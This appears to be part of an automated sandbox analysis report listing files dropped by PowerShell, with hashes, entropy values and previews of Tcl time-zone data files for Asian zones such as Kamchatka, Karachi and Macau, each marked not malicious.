                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kamchatka) {.. {-9223372036854775808 38076 0 LMT}.. {-1487759676 39600 0 +11}.. {-1247569200 43200 0 +13}.. {354888000 46800 1 +13}.. {370695600 43200 0 +12}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965600 43200 0 +12}.. {764
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):457
                                                                                                                                                                                                                              Entropy (8bit):4.396286144160272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862dmdH35Cy6DvjeQXvjKEn6vNEhFc0bkTfb2iWToN1:5de3IjjeQ/jKE6vNNa8
                                                                                                                                                                                                                              MD5:DF604BCD42A3C1E6BABD0E4FF5764CA3
                                                                                                                                                                                                                              SHA1:984111F3A75EE7D8760AA2B839010545AF8EE359
                                                                                                                                                                                                                              SHA-256:4E7F7ACAE8B4018A835328744F680C8054771805BB0BB07678A09737963C090D
                                                                                                                                                                                                                              SHA-512:690AC3FC7CA3C66AA70F17E38C6B43FFACAB3F86040C3BA94FBFF80AC8C1AECF8192E503282109DABF3228F8DC73C732F1041C80455B8B26BDB25C4C32FA286A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Karachi) {.. {-9223372036854775808 16092 0 LMT}.. {-1988166492 19800 0 +0530}.. {-862637400 23400 1 +0630}.. {-764145000 19800 0 +0530}.. {-576135000 18000 0 +05}.. {38775600 18000 0 PKT}.. {1018119600 21600 1 PKST}.. {1033840800 18000 0 PKT}.. {1212260400 21600 1 PKST}.. {1225476000 18000 0 PKT}.. {1239735600 21600 1 PKST}.. {1257012000 18000 0 PKT}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):174
                                                                                                                                                                                                                              Entropy (8bit):4.967143524972358
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2WFKu3e2WFKjov:SlSWB9vsM3yMGSHAIgvAN/2wKulwKjy
                                                                                                                                                                                                                              MD5:259662F35AA09A891C2DDF8FCFECD6F0
                                                                                                                                                                                                                              SHA1:DBB3A363A34C33F0B6B0D677E43C2985E2BAF976
                                                                                                                                                                                                                              SHA-256:7B2251F0A41CBADF45D69F24604834167B14D8D33B510E635719AB404CABBCE2
                                                                                                                                                                                                                              SHA-512:CD7E514555D58985C774535556B66542EFC5FB7CD5891F42FE21B591612CB7EBD4B41E96593E26E9283BA1B01EF3BE0FDFAE871F5EF6ADF2286AF1E479DCB44B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Asia/Kashgar) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.896398105471451
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKXIi7hvXMXGm2OHF+VT5oHsQKwMTXvv6Q6zRk8P4VvW/:SlSWB9eg/2wKYghfDm2OH0T5oHxNMzv8
                                                                                                                                                                                                                              MD5:7AC6429D2A08372C71C61B4521246FEC
                                                                                                                                                                                                                              SHA1:6E50F5AD1018398491453D751F8B717B618EF46E
                                                                                                                                                                                                                              SHA-256:F0A0816E62036637F75081CBF17A1E6B8FBC2D86AEC3CD2E234BBBDD6EC9F109
                                                                                                                                                                                                                              SHA-512:A5389A318896ABCAFE419262F6B8CA86C917788F1E2AFBC8CB1C074A52870E7A92C9F6F7D79DDE4AB0D267D870D3CCD69B3FC5FD57520352EFE36C583B493FB9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kathmandu) {.. {-9223372036854775808 20476 0 LMT}.. {-1577943676 19800 0 +0530}.. {504901800 20700 0 +0545}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.8363583658476745
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8yIi7V5XHAIgN1AIilvWARL/2WFKSiZ1/2WFKXIi7y:SlSWB9vsM3y7gVJHAIg5QOAN/2wKSg15
                                                                                                                                                                                                                              MD5:4CCC96293A33113D9ADC4130DCD19CBA
                                                                                                                                                                                                                              SHA1:7BAB4B8DD6BB415A2FC86D9AB36BE2A893C03153
                                                                                                                                                                                                                              SHA-256:9ACC9586B6F8B53BFE8B242283A434A9A9633D60559EBFDEE263B4C8915D50CA
                                                                                                                                                                                                                              SHA-512:644E1777E01C15A728E30526F131462FCE50476A8FEDA9B99F41D95013BB8833A79437E75AA2025E2FD2E253B9AD40709DEF77E1F0C73DAAE7A9CF886A175A03
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Kathmandu)]} {.. LoadTimeZoneFile Asia/Kathmandu..}..set TZData(:Asia/Katmandu) $TZData(:Asia/Kathmandu)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2119
                                                                                                                                                                                                                              Entropy (8bit):3.707911838150672
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5No6r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFYkRDhUBAc6l:r5PhtjLiII2JBC6c6l
                                                                                                                                                                                                                              MD5:D7B394A9662D60D01781005FE73CC9E8
                                                                                                                                                                                                                              SHA1:50B5EBD02596DC45D1F69358C5B69DD3058905FC
                                                                                                                                                                                                                              SHA-256:33203D7FB7F3D1F848640ECE0642A2305E1863B4D47413075E2E7E40BD7418E7
                                                                                                                                                                                                                              SHA-512:055EBA420F2F6049E803796ACCA263264B9E585E5312A86B8DF7B409C5F1CB1810F3AEDACD66CCF4605E55198947D263C240486C2A4D453D23C89802F0C66BBA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Khandyga) {.. {-9223372036854775808 32533 0 LMT}.. {-1579424533 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {7647
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                              Entropy (8bit):4.614218930153471
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKvhfDm2OHEX3gYoHrXdUvvYbQLpUFdvjSVVFJLNsR/QFckVVFJLLW:MB8623tmdHNYCDWXYbQtUTvjAJBs50vs
                                                                                                                                                                                                                              MD5:248F1B5A26455000C936CE8BC02C1A0B
                                                                                                                                                                                                                              SHA1:0C3F8CD4E038B113E5238AC52652809B6CA27999
                                                                                                                                                                                                                              SHA-256:6D464564ED2EFC9DADA1586D4FC99FE333726D2BE15A00E30C2391F588896463
                                                                                                                                                                                                                              SHA-512:AF36B0B3D410305ED504726C87265ACCAF5577A9B5DD7E7DAF135420E356C651287873197431B65B5317B4BA2009274288E4F101AC1274045A8D99E2414AB132
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kolkata) {.. {-9223372036854775808 21208 0 LMT}.. {-3645237208 21200 0 HMT}.. {-3155694800 19270 0 MMT}.. {-2019705670 19800 0 IST}.. {-891581400 23400 1 +0630}.. {-872058600 19800 0 IST}.. {-862637400 23400 1 +0630}.. {-764145000 19800 0 IST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2062
                                                                                                                                                                                                                              Entropy (8bit):3.7086418466382605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Ote2CoXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEw:5B40yVRB7VfXucydm46I/CTxwh
                                                                                                                                                                                                                              MD5:A59F7FFD0C3EBAD47EC5F2B89EBBD9FA
                                                                                                                                                                                                                              SHA1:ACB94E28E0CF7C6606086267CEA1F63A3E755F56
                                                                                                                                                                                                                              SHA-256:53B8D5E7FB1BD67FECE66A933D9BDBB773F14A8C04D316A2A1B00EC6DBC151DD
                                                                                                                                                                                                                              SHA-512:7B3886B9D0A793CCEEDB2B190523922CFEBE5C82A5201C9EFA30CA4C7F63FB75C998CC7E1BD48D5D489F16E36FC0C22BD954CB7D321B3C09B36B60629C4C9F7E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Krasnoyarsk) {.. {-9223372036854775808 22286 0 LMT}.. {-1577513486 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {7
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.956557779400841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq801c3vXHAIgNtK1tyHRL/2WFK1NFWFKf1z:SlSWB9vsM3yUgHAIgWv6N/2wK1NFwKf9
                                                                                                                                                                                                                              MD5:E70767DA85A7E1FA9395FF0B16CFE5CE
                                                                                                                                                                                                                              SHA1:3F78034F166CFC80B54E56AF289C7700A7E4AA5C
                                                                                                                                                                                                                              SHA-256:056D352DDCFEC155375430FFF3C8743ED5C9B51B866A099E97E12CC381071F50
                                                                                                                                                                                                                              SHA-512:FEDC854FB043AA79F132827F98F8983E480727FAA039CF2FB5B82611E724312A4F3F006EE58707F12B0AA90F5872E17F76E2A040CFB3A90D017C5CF92E52DA0A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Singapore)]} {.. LoadTimeZoneFile Asia/Singapore..}..set TZData(:Asia/Kuala_Lumpur) $TZData(:Asia/Singapore)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):669
                                                                                                                                                                                                                              Entropy (8bit):4.074079100812583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKPLBDm2OHXoH3UTdMVSSFVM5qGeCiKaFzsBRcerUNwGvULhMXeiCs:MB862HL1mdHXC3UBMxJJo9rphTXUzHHF
                                                                                                                                                                                                                              MD5:489E706324960E86B6E174D913C72E02
                                                                                                                                                                                                                              SHA1:C7D77482C0D41F3426FC269B3B6C0575EF0E8C7E
                                                                                                                                                                                                                              SHA-256:6E35E560675B0B5322474900D4EC8326C504788C1F82E533B09785DEEFF092DF
                                                                                                                                                                                                                              SHA-512:5CEFD44656C041E59A16481E042EA914E7C003BDE6ADF5F49B57052E91F4F732A91A244BD8BC09EF5DC2640D3210DEE53882717C5C4CBD85CCE44A93B028E9C3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kuching) {.. {-9223372036854775808 26480 0 LMT}.. {-1383463280 27000 0 +0730}.. {-1167636600 28800 0 +08}.. {-1082448000 30000 1 +08}.. {-1074586800 28800 0 +08}.. {-1050825600 30000 1 +08}.. {-1042964400 28800 0 +08}.. {-1019289600 30000 1 +08}.. {-1011428400 28800 0 +08}.. {-987753600 30000 1 +08}.. {-979892400 28800 0 +08}.. {-956217600 30000 1 +08}.. {-948356400 28800 0 +08}.. {-924595200 30000 1 +08}.. {-916734000 28800 0 +08}.. {-893059200 30000 1 +08}.. {-885198000 28800 0 +08}.. {-879667200 32400 0 +09}.. {-767005200 28800 0 +08}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                                              Entropy (8bit):4.877362838821003
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFKdQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKdQ6
                                                                                                                                                                                                                              MD5:EA1DB4B80CC74CBA024B9BF3734B31F2
                                                                                                                                                                                                                              SHA1:D8131C093BCA3B378BEC606CFEB56A40CB4E246F
                                                                                                                                                                                                                              SHA-256:8E0C60A9AA64FB8602EDC35311F7436B04853970A21C1F6C871494A09AAD5787
                                                                                                                                                                                                                              SHA-512:3B57C9CCC16AA4FE71D275D5EC6A7BC1838841023EE4408158362A7E13E7F1B345F7D95006BC8D2FC270158864E286A1A9364C792F679D5803BD82148399C199
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Kuwait) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):169
                                                                                                                                                                                                                              Entropy (8bit):4.781739054385376
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8PWXHAIgNz+NOARL/2WFKf+WFKkvn:SlSWB9vsM3yOHAIg1AN/2wKGwKmn
                                                                                                                                                                                                                              MD5:55DAE27AEAA74FE822338C20B6CDFF68
                                                                                                                                                                                                                              SHA1:F00EB827DC29EB2063B3A0EDBC39856637C55F33
                                                                                                                                                                                                                              SHA-256:4308D741C83B263C7C9FB8EC692A7B7B502135E407B265B12EA7EF92523455C0
                                                                                                                                                                                                                              SHA-512:398EE6015C58BDBBEAB49B74833B938FD84DE1AC6D3B8D095CE772ECA980D9E93F4EBFFFFCEAE7F91E287C8CE4F94B1A078D8E1460C352B7C2018F99915838FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Macau)]} {.. LoadTimeZoneFile Asia/Macau..}..set TZData(:Asia/Macao) $TZData(:Asia/Macau)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2217
                                                                                                                                                                                                                              Entropy (8bit):3.9638741177777868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5ReCX8Iv3nhPHCvzncCHg9PHjZzH+0HDHN1aHhHNaezHBjHeHsH65H18HDH983lY:5d8u3hfCTcaOrh6qn151Wf3Bogp+nlC
                                                                                                                                                                                                                              MD5:B184E7403CB7168607D2C9E158F86A3B
                                                                                                                                                                                                                              SHA1:48B003B8F822BE979FBCB08CBDBFFC617BCF99DB
                                                                                                                                                                                                                              SHA-256:FBCB92CECB1CB0BC284ADC30D70C5F57B3AFC992136A0D898ABC64490BB700FB
                                                                                                                                                                                                                              SHA-512:D8C5C67CAEB7C670B7BD1DACC1203C4DEE4DDB16A780F502C4440997CFCFF869E86842EF87C2CD0E0B942941C02A6BC3BDAB7CEAD78B026B68F4A031173400C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Macau) {.. {-9223372036854775808 27250 0 LMT}.. {-2056692850 28800 0 CST}.. {-884509200 32400 0 +09}.. {-873280800 36000 1 +09}.. {-855918000 32400 0 +09}.. {-841744800 36000 1 +09}.. {-828529200 32400 0 +10}.. {-765363600 28800 0 CT}.. {-747046800 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716461200 32400 1 CDT}.. {-697021200 28800 0 CST}.. {-683715600 32400 1 CDT}.. {-667990800 28800 0 CST}.. {-654771600 32400 1 CDT}.. {-636627600 28800 0 CST}.. {-623322000 32400 1 CDT}.. {-605178000 28800 0 CST}.. {-591872400 32400 1 CDT}.. {-573642000 28800 0 CST}.. {-559818000 32400 1 CDT}.. {-541674000 28800 0 CST}.. {-528368400 32400 1 CDT}.. {-510224400 28800 0 CST}.. {-498128400 32400 1 CDT}.. {-478774800 28800 0 CST}.. {-466678800 32400 1 CDT}.. {-446720400 28800 0 CST}.. {-435229200 32400 1 CDT}.. {-415258200 28800 0 CST}.. {-403158600
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2088
                                                                                                                                                                                                                              Entropy (8bit):3.7643610103361134
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5he9dbbv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKx/y:5wv+0j6lua2Gg/3gO8UoOZU2Wc/pKo
                                                                                                                                                                                                                              MD5:F62A89F441C9C17EB99F64223C815651
                                                                                                                                                                                                                              SHA1:408C38A79E056FF9B03D0DA85114DC015CB66938
                                                                                                                                                                                                                              SHA-256:0C6EEEB7975A95C2B0678D137E6A735238D244A37FA11078050051511DE499FE
                                                                                                                                                                                                                              SHA-512:55DC72546BDC26450D5318E9D2819E32A91C27D06A7AF5432BD50F8722C69984BBAA8599055A824D2935D919F0C0AA357687DD9B47F49F213EEE21AF7458FE17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Magadan) {.. {-9223372036854775808 36192 0 LMT}.. {-1441188192 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):243
                                                                                                                                                                                                                              Entropy (8bit):4.737440985553183
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wK5XDm2OHUVoHxYQTLQTvj1kc3gEpHkH8vScHr0:MB862hTmdHsCLTI6cQe7HHA
                                                                                                                                                                                                                              MD5:9116C0B70AB33EC49F933EAE0238FD4B
                                                                                                                                                                                                                              SHA1:BA390E8FBEAF5EA6E861AFC5A51CD4DF0B422461
                                                                                                                                                                                                                              SHA-256:30D8AB00E32ECE51442C0310E650D89D6989E0809600EE334CB10C506D84BF9D
                                                                                                                                                                                                                              SHA-512:499E60E8CBDA72226BCB4E241020E62B6F88E7D3E4329D260A6536EF87C02D7D61FD1BECC47D4FF308B4EB5D3E7FFBE2EC1C96FE2DEDC09DD1D973421C5FFE1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Makassar) {.. {-9223372036854775808 28656 0 LMT}.. {-1577951856 28656 0 MMT}.. {-1172908656 28800 0 +08}.. {-880272000 32400 0 +09}.. {-766054800 28800 0 WITA}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):421
                                                                                                                                                                                                                              Entropy (8bit):4.48495488773916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862GjmdHnCTZBCvEo6AwoucQzy4orjAbomAtoNv:5GjeCVwvB6AduXzylHAMmAa9
                                                                                                                                                                                                                              MD5:0FBF0ED252638DF31826C33EB3FFBFE2
                                                                                                                                                                                                                              SHA1:3496E4A5251A9BDF3AA4368297140780B6DBF66D
                                                                                                                                                                                                                              SHA-256:070D61A0E39643A700ABA89A8A4BE5733BA456958966098405E11ECDFA854D76
                                                                                                                                                                                                                              SHA-512:2A40E14964B357809E596DF88D8C4141ED78664BACA0A7724A7CA837EF427DC2B07C48D9DBE5787FAB0015673F5BDE002223D489334C5B91B74EEC5507A14B78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Manila) {.. {-9223372036854775808 -57360 0 LMT}.. {-3944621040 29040 0 LMT}.. {-2229321840 28800 0 PST}.. {-1046678400 32400 1 PDT}.. {-1038733200 28800 0 PST}.. {-873273600 32400 0 JST}.. {-794221200 28800 0 PST}.. {-496224000 32400 1 PDT}.. {-489315600 28800 0 PST}.. {259344000 32400 1 PDT}.. {275151600 28800 0 PST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                              Entropy (8bit):4.805992552335358
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8DeXHAIgN6S7ARL/2WFKvE+H+WFKQ3n:SlSWB9vsM3yj+HAIgMS7AN/2wKLewKQ3
                                                                                                                                                                                                                              MD5:8AEB5C3E81069F884A370714E8013F1F
                                                                                                                                                                                                                              SHA1:4E3DD4A84627E75E84726C0CBA72CA6801280C2B
                                                                                                                                                                                                                              SHA-256:011B7DE1C9F7EC241B224BC864D8AE66ACB433FBC8AD939E4DBEB12BE6390243
                                                                                                                                                                                                                              SHA-512:50B1DE2615AE9B4781505DC709F9D07F6221D4E6D7B61D7BDA682377EAD9807F47FF0E933B79823D0DFD9F3647A82CFC28FB41FBB2226ED1D08B76F86FEB45DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dubai)]} {.. LoadTimeZoneFile Asia/Dubai..}..set TZData(:Asia/Muscat) $TZData(:Asia/Dubai)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7625
                                                                                                                                                                                                                              Entropy (8bit):3.7113086720696398
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:R3pv/7V6Aj8aZaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:R3v/AauivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:2ADD0DFC1F133E4D044727234251A3DC
                                                                                                                                                                                                                              SHA1:0D1502986258349E384017BA6CB8FA0AC424638C
                                                                                                                                                                                                                              SHA-256:3C3E4844C70D361893EF022D6C3C8E38B243E91D40C5A726C924355476816F25
                                                                                                                                                                                                                              SHA-512:70CDD53E7E44EDABF653A4F92EECBF5BB20A31DA95D65209D1CADE7DD9FC68946B8EC8829C28AE00BE5F42AAB545B9282CBBCFC5834437D6A94A179BF4FE0141
                                                                                                                                                                                                                              Malicious:false
